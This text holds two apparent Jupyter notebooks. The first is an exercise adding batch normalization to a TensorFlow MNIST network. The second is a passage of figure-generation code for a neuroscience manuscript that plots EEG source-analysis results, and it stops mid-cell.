print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))
# At the end, score the final accuracy for both the validation and test sets
acc = sess.run(accuracy, {inputs: mnist.validation.images,
labels: mnist.validation.labels})
print('Final validation accuracy: {:>3.5f}'.format(acc))
acc = sess.run(accuracy, {inputs: mnist.test.images,
labels: mnist.test.labels})
print('Final test accuracy: {:>3.5f}'.format(acc))
# Score the first 100 test images individually. This won't work if batch normalization isn't implemented correctly.
correct = 0
for i in range(100):
correct += sess.run(accuracy,feed_dict={inputs: [mnist.test.images[i]],
labels: [mnist.test.labels[i]]})
print("Accuracy on 100 samples:", correct/100)
num_batches = 800
batch_size = 64
learning_rate = 0.002
tf.reset_default_graph()
with tf.Graph().as_default():
train(num_batches, batch_size, learning_rate)
```
With this many layers, it's going to take a lot of iterations for this network to learn. By the time you're done training these 800 batches, your final test and validation accuracies probably won't be much better than 10%. (It will be different each time, but will most likely be less than 15%.)
Using batch normalization, you'll be able to train this same network to over 90% in that same number of batches.
# Add batch normalization
We've copied the previous three cells to get you started. **Edit these cells** to add batch normalization to the network. For this exercise, you should use [`tf.layers.batch_normalization`](https://www.tensorflow.org/api_docs/python/tf/layers/batch_normalization) to handle most of the math, but you'll need to make a few other changes to your network to integrate batch normalization. You may want to refer back to the lesson notebook to remind yourself of important things, like how your graph operations need to know whether or not you are performing training or inference.
If you get stuck, you can check out the `Batch_Normalization_Solutions` notebook to see how we did things.
**TODO:** Modify `fully_connected` to add batch normalization to the fully connected layers it creates. Feel free to change the function's parameters if it helps.
```
def fully_connected(prev_layer, num_units, is_training):
    """Build a dense layer followed by batch normalization and ReLU.

    :param prev_layer: Tensor
        The Tensor that acts as input into this layer
    :param num_units: int
        The size of the layer. That is, the number of units, nodes, or neurons.
    :param is_training: bool Tensor
        True while training (use batch statistics), False at inference
        (use the learned population statistics).
    :returns Tensor
        A new batch-normalized, ReLU-activated fully connected layer
    """
    # Bias is omitted: batch normalization's beta term already provides
    # the learned shift, and the activation is applied after normalization.
    dense = tf.layers.dense(prev_layer, num_units, use_bias=False, activation=None)
    normalized = tf.layers.batch_normalization(dense, training=is_training)
    return tf.nn.relu(normalized)
```
**TODO:** Modify `conv_layer` to add batch normalization to the convolutional layers it creates. Feel free to change the function's parameters if it helps.
```
def conv_layer(prev_layer, layer_depth, is_training):
    """Build a 3x3 convolution followed by batch normalization and ReLU.

    :param prev_layer: Tensor
        The Tensor that acts as input into this layer
    :param layer_depth: int
        We'll set the strides and number of feature maps based on the layer's depth in the network.
        This is *not* a good way to make a CNN, but it helps us create this example with very little code.
    :param is_training: bool Tensor
        True while training (use batch statistics), False at inference
        (use the learned population statistics).
    :returns Tensor
        A new batch-normalized, ReLU-activated convolutional layer
    """
    # Downsample (stride 2) on every third layer, otherwise keep spatial size
    stride = 2 if layer_depth % 3 == 0 else 1
    # Bias is omitted: batch normalization's beta term already shifts the
    # activations; ReLU is applied after normalization.
    conv = tf.layers.conv2d(prev_layer, layer_depth*4, 3, stride, 'same', activation=None, use_bias=False)
    normalized = tf.layers.batch_normalization(conv, training=is_training)
    return tf.nn.relu(normalized)
```
**TODO:** Edit the `train` function to support batch normalization. You'll need to make sure the network knows whether or not it is training, and you'll need to make sure it updates and uses its population statistics correctly.
```
def train(num_batches, batch_size, learning_rate):
    """Build and train the 20-conv-layer network WITH batch normalization."""
    # Build placeholders for the input samples and labels
    inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
    labels = tf.placeholder(tf.float32, [None, 10])
    # Tells each batch-norm op whether to use batch or population statistics
    is_training = tf.placeholder(tf.bool)

    # Feed the inputs into a series of 20 convolutional layers
    layer = inputs
    for layer_i in range(1, 20):
        layer = conv_layer(layer, layer_i, is_training)

    # Flatten the output from the convolutional layers
    orig_shape = layer.get_shape().as_list()
    layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])

    # Add one fully connected layer
    layer = fully_connected(layer, 100, is_training)

    # Create the output layer with 1 node for each class
    logits = tf.layers.dense(layer, 10)

    # Define loss and training operations
    model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
    # tf.layers.batch_normalization registers its moving-average updates in
    # the UPDATE_OPS collection; they must run before each training step so
    # the population statistics used at inference are actually maintained.
    with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
        train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)

    # Create operations to test accuracy
    correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

    # Train and test the network
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        for batch_i in range(num_batches):
            batch_xs, batch_ys = mnist.train.next_batch(batch_size)

            # train this batch (batch statistics)
            sess.run(train_opt, {inputs: batch_xs, labels: batch_ys, is_training: True})

            # Periodically check the validation or training loss and accuracy
            # (always evaluated with is_training False, i.e. population stats)
            if batch_i % 100 == 0:
                loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images,
                                                              labels: mnist.validation.labels,
                                                              is_training: False})
                print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
            elif batch_i % 25 == 0:
                loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys,
                                                              is_training: False})
                print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))

        # At the end, score the final accuracy for both the validation and test sets
        acc = sess.run(accuracy, {inputs: mnist.validation.images,
                                  labels: mnist.validation.labels,
                                  is_training: False})
        print('Final validation accuracy: {:>3.5f}'.format(acc))
        acc = sess.run(accuracy, {inputs: mnist.test.images,
                                  labels: mnist.test.labels,
                                  is_training: False})
        print('Final test accuracy: {:>3.5f}'.format(acc))

        # Score the first 100 test images individually. This won't work if batch normalization isn't implemented correctly.
        correct = 0
        for i in range(100):
            correct += sess.run(accuracy,feed_dict={inputs: [mnist.test.images[i]],
                                                    labels: [mnist.test.labels[i]],
                                                    is_training: False})
        print("Accuracy on 100 samples:", correct/100)

# Hyperparameters for this run
num_batches = 800
batch_size = 64
learning_rate = 0.002

tf.reset_default_graph()
with tf.Graph().as_default():
    train(num_batches, batch_size, learning_rate)
```
With batch normalization, you should now get an accuracy over 90%. Notice also the last line of the output: `Accuracy on 100 samples`. If this value is low while everything else looks good, that means you did not implement batch normalization correctly. Specifically, it means you either did not calculate the population mean and variance while training, or you are not using those values during inference.
# Batch Normalization using `tf.nn.batch_normalization`<a id="example_2"></a>
Most of the time you will be able to use higher level functions exclusively, but sometimes you may want to work at a lower level. For example, if you ever want to implement a new feature – something new enough that TensorFlow does not already include a high-level implementation of it, like batch normalization in an LSTM – then you may need to know these sorts of things.
This version of the network uses `tf.nn` for almost everything, and expects you to implement batch normalization using [`tf.nn.batch_normalization`](https://www.tensorflow.org/api_docs/python/tf/nn/batch_normalization).
**Optional TODO:** You can run the next three cells before you edit them just to see how the network performs without batch normalization. However, the results should be pretty much the same as you saw with the previous example before you added batch normalization.
**TODO:** Modify `fully_connected` to add batch normalization to the fully connected layers it creates. Feel free to change the function's parameters if it helps.
**Note:** For convenience, we continue to use `tf.layers.dense` for the `fully_connected` layer. By this point in the class, you should have no problem replacing that with matrix operations between the `prev_layer` and explicit weights and biases variables.
```
def fully_connected(prev_layer, num_units, is_training):
    """
    Create a fully connected layer with the given layer as input and the given number of neurons.

    :param prev_layer: Tensor
        The Tensor that acts as input into this layer
    :param num_units: int
        The size of the layer. That is, the number of units, nodes, or neurons.
    :param is_training: bool Tensor
        True while training (normalize with batch statistics and update the
        population statistics), False at inference (use population statistics).
    :returns Tensor
        A new fully connected layer
    """
    layer = tf.layers.dense(prev_layer, num_units, activation=None, use_bias=False)

    # Learned scale (gamma) and shift (beta) applied after normalization
    gamma = tf.Variable(tf.ones([num_units]))
    beta = tf.Variable(tf.zeros([num_units]))

    # Non-trainable running estimates of the population mean/variance,
    # updated by an exponential moving average while training
    pop_mean = tf.Variable(tf.zeros([num_units]), trainable=False)
    pop_variance = tf.Variable(tf.ones([num_units]), trainable=False)

    epsilon = 1e-3  # keeps the normalization stable when variance is tiny

    def batch_norm_training():
        # Mean/variance over the batch axis for each of the num_units features
        batch_mean, batch_variance = tf.nn.moments(layer, [0])

        decay = 0.99
        train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))
        train_variance = tf.assign(pop_variance, pop_variance * decay + batch_variance * (1 - decay))

        # Make sure the moving averages are updated before emitting the output
        with tf.control_dependencies([train_mean, train_variance]):
            return tf.nn.batch_normalization(layer, batch_mean, batch_variance, beta, gamma, epsilon)

    def batch_norm_inference():
        return tf.nn.batch_normalization(layer, pop_mean, pop_variance, beta, gamma, epsilon)

    # Choose the training or inference path based on the is_training placeholder
    batch_normalized_output = tf.cond(is_training, batch_norm_training, batch_norm_inference)
    return tf.nn.relu(batch_normalized_output)
```
**TODO:** Modify `conv_layer` to add batch normalization to the convolutional layers it creates. Feel free to change the function's parameters if it helps.
**Note:** Unlike in the previous example that used `tf.layers`, adding batch normalization to these convolutional layers _does_ require some slight differences to what you did in `fully_connected`.
```
def conv_layer(prev_layer, layer_depth, is_training):
    """
    Create a convolutional layer with the given layer as input.

    :param prev_layer: Tensor
        The Tensor that acts as input into this layer
    :param layer_depth: int
        We'll set the strides and number of feature maps based on the layer's depth in the network.
        This is *not* a good way to make a CNN, but it helps us create this example with very little code.
    :param is_training: bool Tensor
        True while training (normalize with batch statistics and update the
        population statistics), False at inference (use population statistics).
    :returns Tensor
        A new convolutional layer
    """
    # Stride 2 (downsampling) on every third layer, stride 1 otherwise
    strides = 2 if layer_depth % 3 == 0 else 1

    in_channels = prev_layer.get_shape().as_list()[3]
    out_channels = layer_depth*4

    weights = tf.Variable(
        tf.truncated_normal([3, 3, in_channels, out_channels], stddev=0.05))

    layer = tf.nn.conv2d(prev_layer, weights, strides=[1, strides, strides, 1], padding='SAME')

    # Per-channel learned scale (gamma) and shift (beta)
    gamma = tf.Variable(tf.ones([out_channels]))
    beta = tf.Variable(tf.zeros([out_channels]))

    # Non-trainable running estimates of the per-channel population statistics
    pop_mean = tf.Variable(tf.zeros([out_channels]), trainable=False)
    pop_variance = tf.Variable(tf.ones([out_channels]), trainable=False)

    epsilon = 1e-3  # keeps the normalization stable when variance is tiny

    def batch_norm_training():
        # Unlike the dense case, moments are taken over batch AND spatial
        # axes, giving one mean/variance per output channel
        batch_mean, batch_variance = tf.nn.moments(layer, [0, 1, 2], keep_dims=False)

        decay = 0.99
        train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))
        train_variance = tf.assign(pop_variance, pop_variance * decay + batch_variance * (1 - decay))

        # Make sure the moving averages are updated before emitting the output
        with tf.control_dependencies([train_mean, train_variance]):
            return tf.nn.batch_normalization(layer, batch_mean, batch_variance, beta, gamma, epsilon)

    def batch_norm_inference():
        return tf.nn.batch_normalization(layer, pop_mean, pop_variance, beta, gamma, epsilon)

    # Choose the training or inference path based on the is_training placeholder
    batch_normalized_output = tf.cond(is_training, batch_norm_training, batch_norm_inference)
    return tf.nn.relu(batch_normalized_output)
```
**TODO:** Edit the `train` function to support batch normalization. You'll need to make sure the network knows whether or not it is training.
```
def train(num_batches, batch_size, learning_rate):
    """Build and train the network with the hand-rolled tf.nn batch normalization."""
    # Build placeholders for the input samples and labels
    inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
    labels = tf.placeholder(tf.float32, [None, 10])
    # Tells each batch-norm op whether to use batch or population statistics
    is_training = tf.placeholder(tf.bool)

    # Feed the inputs into a series of 20 convolutional layers
    layer = inputs
    for layer_i in range(1, 20):
        layer = conv_layer(layer, layer_i, is_training)

    # Flatten the output from the convolutional layers
    orig_shape = layer.get_shape().as_list()
    layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])

    # Add one fully connected layer
    layer = fully_connected(layer, 100, is_training)

    # Create the output layer with 1 node for each class
    logits = tf.layers.dense(layer, 10)

    # Define loss and training operations
    # NOTE: no UPDATE_OPS handling is needed here — the moving-average
    # updates are already attached via control_dependencies inside each
    # layer's batch_norm_training branch.
    model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
    train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)

    # Create operations to test accuracy
    correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

    # Train and test the network
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        for batch_i in range(num_batches):
            batch_xs, batch_ys = mnist.train.next_batch(batch_size)

            # train this batch (batch statistics)
            sess.run(train_opt, {inputs: batch_xs, labels: batch_ys, is_training: True})

            # Periodically check the validation or training loss and accuracy
            # (always evaluated with is_training False, i.e. population stats)
            if batch_i % 100 == 0:
                loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images,
                                                              labels: mnist.validation.labels,
                                                              is_training: False})
                print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
            elif batch_i % 25 == 0:
                loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys,
                                                              is_training: False})
                print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))

        # At the end, score the final accuracy for both the validation and test sets
        acc = sess.run(accuracy, {inputs: mnist.validation.images,
                                  labels: mnist.validation.labels,
                                  is_training: False})
        print('Final validation accuracy: {:>3.5f}'.format(acc))
        acc = sess.run(accuracy, {inputs: mnist.test.images,
                                  labels: mnist.test.labels,
                                  is_training: False})
        print('Final test accuracy: {:>3.5f}'.format(acc))

        # Score the first 100 test images individually. This won't work if batch normalization isn't implemented correctly.
        correct = 0
        for i in range(100):
            correct += sess.run(accuracy,feed_dict={inputs: [mnist.test.images[i]],
                                                    labels: [mnist.test.labels[i]],
                                                    is_training: False})
        print("Accuracy on 100 samples:", correct/100)

# Hyperparameters for this run
num_batches = 800
batch_size = 64
learning_rate = 0.002

tf.reset_default_graph()
with tf.Graph().as_default():
    train(num_batches, batch_size, learning_rate)
```
Once again, the model with batch normalization should reach an accuracy over 90%. There are plenty of details that can go wrong when implementing at this low level, so if you got it working - great job! If not, do not worry, just look at the `Batch_Normalization_Solutions` notebook to see what went wrong.
| github_jupyter |
# Figures (Original Submission)
### MSIT Overlay
```
## Figure 1: render the MSIT activation overlay and ROI label borders on the
## left-hemisphere inflated surface with PySurfer, then save lateral and
## medial screenshots.
import os
from surfer import Brain
%matplotlib qt4
fs_dir = '/autofs/space/sophia_002/users/EMOTE-DBS/freesurfs'
subj_dir = os.environ["SUBJECTS_DIR"]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Surface parameters.
subject = "fscopy"
surf = "inflated"
hemi = 'lh'
## I/O parameters.
overlay = os.path.join(fs_dir, subject, 'label', 'april2016', 'darpa_msit_overlay-lh.mgz')
color = '#AFFF94'
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Make Figure.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
labels = ['dacc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh', 'dlpfc_3-lh',
          'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh', 'pcc-lh', 'racc-lh']
brain = Brain(subject, hemi, surf, background='white')
## Draw each ROI as a border-only label in the shared highlight color.
for label in labels:
    label = os.path.join(fs_dir, subject, 'label', 'april2016', '%s.label' %label)
    brain.add_label(label, color=color, alpha=1, borders=3)
## Positive overlay thresholded at 1.301 (= -log10 of p = 0.05); hide its colorbar.
brain.add_overlay(overlay, min=1.301, max=5, sign='pos', name='msit')
brain.overlays['msit'].pos_bar.visible = False
## Lateral view.
brain.show_view(dict(azimuth=150, roll=90), distance=350)
brain.save_image('plots/manuscript/fig1/msit_overlay_lateral.png')
## Medial view.
brain.show_view('medial', distance=425)
brain.save_image('plots/manuscript/fig1/msit_overlay_medial.png')
## Scratch view of a single label on the pial surface (different recon dir).
import os
from surfer import Brain
%matplotlib qt4
fs_dir = '/media/SZORO/arc-fir/recons/'
brain = Brain('fscopy', 'lh', 'pial', subjects_dir=fs_dir)
# brain.add_label('/media/SZORO/arc-fir/recons/fscopy/label/laus125/superiorfrontal_4-lh.label')
# brain.add_label('/media/SZORO/arc-fir/recons/fscopy/label/laus125/caudalmiddlefrontal_1-lh.label')
# brain.show_view('medial')
brain.add_label('/media/SZORO/EMOTE-DBS/freesurfs/fscopy/label/april2016/dlpfc_2-lh.label')
```
## Figure 2
### Grand Average Topoplots (Time-Domain)
```
## Figure 2: grand-average ERP topoplots. Per subject: load epochs, align
## channel names to the standard 10-20 montage, 15 Hz low-pass, average to an
## evoked response; then grand-average across subjects and plot topomaps.
import os
import numpy as np
import pylab as plt
from mne import EpochsArray, combine_evoked, grand_average, read_epochs, set_log_level
from mne.channels import read_montage
from mne.filter import low_pass_filter
set_log_level(verbose=False)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
subjects = ['BRTU','CHDR','CRDA','JADE','JASE','M5','MEWA','S2']
analysis = 'resp'   # event locking of the epochs file: 'stim' or 'resp'
task = 'msit'
h_freq = 50         # filename component of the saved epochs
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
montage = read_montage('standard_1020')
evokeds = []
for subject in subjects:
    ## Load epochs.
    epochs = read_epochs('ave/%s_%s_%s_%s-epo.fif' %(subject,task,h_freq,analysis))
    ## Update channel names according to montage (case-insensitive match).
    ch_map = dict()
    for ch in epochs.ch_names:
        ix = [m.lower() for m in montage.ch_names].index(ch.lower())
        ch_map[ch] = montage.ch_names[ix]
    epochs.rename_channels(ch_map)
    ## Set montage.
    epochs.set_montage(montage)
    ## Lowpass filter at 15 Hz. Reassemble into a fresh EpochsArray.
    ## NOTE(review): mne.filter.low_pass_filter is a legacy API (replaced by
    ## filter_data in modern MNE) — confirm the pinned MNE version.
    data = epochs.get_data()
    data = low_pass_filter(data, epochs.info['sfreq'], 15., filter_length='2s', n_jobs=3,)
    epochs = EpochsArray(data, epochs.info, epochs.events, epochs.tmin, epochs.event_id, proj=False)
    ## Compute evoked.
    evokeds.append( epochs.average() )
## Compute grand average.
evokeds = grand_average(evokeds)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Two figures per condition: the same topomap without and with a colorbar.
## NOTE(review): cmap='spectral' (lowercase) only exists in older matplotlib;
## modern versions spell it 'Spectral' — verify against the environment.
if analysis == 'stim':
    fig = plt.figure(figsize=(6,6))
    ax = plt.subplot2grid((1,1),(0,0))
    evokeds.plot_topomap(times = 0.52, cmap='spectral', colorbar=False, average=0.05, axes=ax)
    fig = plt.figure(figsize=(6,6))
    ax = plt.subplot2grid((1,1),(0,0))
    evokeds.plot_topomap(times = 0.52, cmap='spectral', colorbar=True, average=0.05, axes=ax)
elif analysis == 'resp':
    fig = plt.figure(figsize=(6,6))
    ax = plt.subplot2grid((1,1),(0,0))
    evokeds.plot_topomap(times = -0.7, cmap='spectral', colorbar=False, average=0.05, axes=ax)
    fig = plt.figure(figsize=(6,6))
    ax = plt.subplot2grid((1,1),(0,0))
    evokeds.plot_topomap(times = -0.7, cmap='spectral', colorbar=True, average=0.05, axes=ax)
```
### dACC Figure
```
## dACC ERP figure: 2x2 grid of condition-averaged time courses
## (rows: Interference / DBS contrasts; columns: stim- / resp-locked),
## with FDR-significant cluster windows shaded in gray.
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## File parameters.
model_name = 'revised'
space = 'source'
label = 'dacc-lh'
freq = 15
## Plotting parameters.
contrasts = ['Interference','DBS']
palettes = [ ['#7b3294','#008837'], ['#0571b0','#ca0020'] ]
annotations = [ ['Control', 'Interference'], ['DBS OFF','DBS ON'] ]
y1, y2 = -0.2, 0.3   # shared y-limits for cluster shading / markers
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Initialize figure.
fig, axes = plt.subplots(2,2,figsize=(12,8),sharey=True)
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
for n, contrast, colors, legends in zip(range(2), contrasts, palettes, annotations):
    for m, analysis in enumerate(['stim', 'resp']):
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ### Load data.
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ## Load source data (trials x times array + time axis).
        npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
        data = npz['data']
        times = npz['times']
        ## Load cluster results.
        f = os.path.join(space, 'results', '%s_%s_timedomain_results.csv' %(model_name, analysis))
        clusters = read_csv(f)
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ### Plotting.
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ## Mean +/- SEM trace for each level (0/1) of the contrast.
        for i, color, legend in zip(range(2),colors,legends):
            ix, = np.where(info[contrast]==i)
            mu = data[ix].mean(axis=0)
            se = data[ix].std(axis=0) / np.sqrt(len(ix))
            axes[n,m].plot(times, mu, linewidth=3, color=color, label=legend)
            axes[n,m].fill_between(times, mu-se, mu+se, color=color, alpha=0.2)
        ## Shade FDR-significant clusters for this label/freq/contrast.
        axes[n,m].set_ylim(-0.2,0.2)
        for ix in np.where((clusters.Label==label)&(clusters.Freq==freq)&
                           (clusters.Contrast==contrast)&(clusters.FDR<0.05))[0]:
            tmin, tmax = clusters.loc[ix,'Tmin'], clusters.loc[ix,'Tmax']
            ## BUGFIX: np.linspace needs an integer sample count; the old
            ## float literal 1e3 raises TypeError on modern numpy (the
            ## sibling theta figure already used 1000 here).
            axes[n,m].fill_between(np.linspace(tmin, tmax, 1000), y1, y2, color='k', alpha=0.2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
for n in range(2):
    for m in range(2):
        ## Stimulus-locked edits.
        if not m:
            ## Fix axes (tick labels re-zeroed to MSIT onset at 0.4 s).
            xticks = np.array([0.0, 0.4, 0.9, 1.4])
            axes[n,m].set(xticks=xticks, xticklabels=xticks - 0.4,
                          xlim=(-0.25,1.5), ylim=(y1,y2))
            ## Add event markers.
            for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
                axes[n,m].text(x+0.02,y1+np.abs(y1*0.05),s,fontsize=22)
                axes[n,m].vlines(x,y1,y2,linestyle='--',alpha=0.3)
        ## Response-locked edits.
        else:
            ## Fix axes.
            xticks = np.array([-1.0, -0.5, 0.0, 0.5, 1.0])
            axes[n,m].set(xticks=xticks, xlim=(-1.0, 1.0))
            ## Add response marker.
            axes[n,m].text(0.02,y1+np.abs(y1*0.05),'Resp',fontsize=22)
            axes[n,m].vlines(0.0,y1,y2,linestyle='--',alpha=0.3)
        ## Add legends above plot.
        axes[n,m].legend(loc=1, handlelength=1.2, handletextpad=0.5,
                         labelspacing=0.1, borderpad=0)
        ## Add x-labels on the bottom row only.
        if n: axes[n,m].set_xlabel('Time (s)')
sns.despine()
plt.subplots_adjust(top=0.97, left = 0.08, right = 0.98,
                    bottom=0.1, hspace=0.35, wspace=0.1)
plt.savefig('plots/manuscript/fig2/dacc_erp.png')
plt.savefig('plots/manuscript/fig2/dacc_erp.svg')
plt.show()
plt.close()
```
### Significant ERP Clusters
```
## Figure 2: raster of FDR-significant ERP clusters per ROI (rows) and
## time (x), colored by contrast.
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
f = 'source/results/revised_stim_timedomain_results.csv'
df = read_csv(f)
## Limit data to FDR-significant clusters.
df = df[df.FDR<0.05].reset_index(drop=True)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
fig, ax = plt.subplots(1,1,figsize=(6,12))
## Row order: left-hemisphere ROIs first, then right (reversed when plotting
## so lh ends up at the top of the axis).
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
          'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
          'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
          'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
## One shaded bar per significant cluster; contrasts other than
## Interference / nsArousal are skipped.
for n in range(len(df)):
    if df.loc[n,'Contrast'] == 'Interference': color = '#008837'
    elif df.loc[n,'Contrast'] == 'nsArousal': color = '#e6550d'
    else: continue
    y = labels[::-1].index(df.loc[n,'Label'])
    ax.fill_between(df.loc[n,['Tmin','Tmax']].astype(float), y+0.05, y+0.95, color=color, alpha=0.8)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Add legend (empty plots only provide legend handles).
for label, color in zip(['Interference','Arousal'],['#008837','#e6550d']):
    ax.plot([],[],lw=10,color=color,label=label,alpha=0.7)
ax.legend(bbox_to_anchor=(0.7,1.1), handlelength=1.25, borderaxespad=0)
## Add timing details.
y1, y2 = 0, len(labels)
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
    ax.text(x+0.02,0.25,s,fontsize=20)
    ax.vlines(x, y1, y2, linewidth=2.5, linestyle='--',alpha=0.2)
## Fix x-axis (tick labels re-zeroed to MSIT onset at 0.4 s).
xticks = np.array([0.0, 0.4, 0.9, 1.4])
ax.set(xticks=xticks, xticklabels=xticks-0.4, xlim=(-0.25,1.5),xlabel='Time (s)')
## Fix y-axis with display names for the same ROI order.
labels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2', 'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
ax.set(yticks=np.arange(len(labels))+0.5, yticklabels=labels[::-1], ylim=(0,len(labels)))
## Add dendrograms.
def dendrogram(ax, x, y1, y2, text):
    """Draw a hemisphere bracket beside the y-axis.

    Renders (in axes-fraction coordinates) one vertical line at ``x``
    spanning ``y1``..``y2``, two short horizontal ticks connecting it back
    toward the axis, and the rotated ``text`` label centered on the span.
    """
    ## Shared line appearance.
    line_width = 2.0
    line_alpha = 0.2
    ## Vertical spine, then the two horizontal ticks at either end.
    segments = [((x, y1), (x, y2)),
                ((x*1.02, y1), (-1e-3, y1)),
                ((x*1.02, y2), (-1e-3, y2))]
    for head, tail in segments:
        ax.annotate('', head, xycoords='axes fraction', xytext=tail,
                    arrowprops=dict(arrowstyle='-', color='k',
                                    linewidth=line_width, alpha=line_alpha))
    ## Rotated caption centered on the bracket.
    ax.annotate(text, (0, 0), xycoords='axes fraction',
                xytext=(x*1.4, (y1 + y2) / 2.0), rotation=90, va='center')
## Bracket the lower/upper halves of the ROI axis by hemisphere, then save.
dendrogram(ax, -0.38, 0, 0.495, 'Right Hemisphere')
dendrogram(ax, -0.38, 0.505, 1, 'Left Hemisphere')
sns.despine()
plt.subplots_adjust(left=0.35, right=0.975, top=0.925, bottom=0.075)
plt.savefig('plots/manuscript/fig2/all_erps.png', dpi=180)
plt.savefig('plots/manuscript/fig2/all_erps.svg', dpi=180)
plt.show()
plt.close()
```
## Figure 3
### Cluster Mass Calculations
```
## Figure 3 statistics: for each analysis epoch, compute what percentage of
## each significant DBS-theta cluster falls inside the task window, then the
## left-hemisphere share of total cluster duration.
import numpy as np
from pandas import read_csv, concat
combined = []
for analysis in ['stim', 'resp']:
    ## Load info; keep only FDR-significant DBS theta clusters.
    df = read_csv('source/results/revised_%s_frequency_results.csv' %analysis)
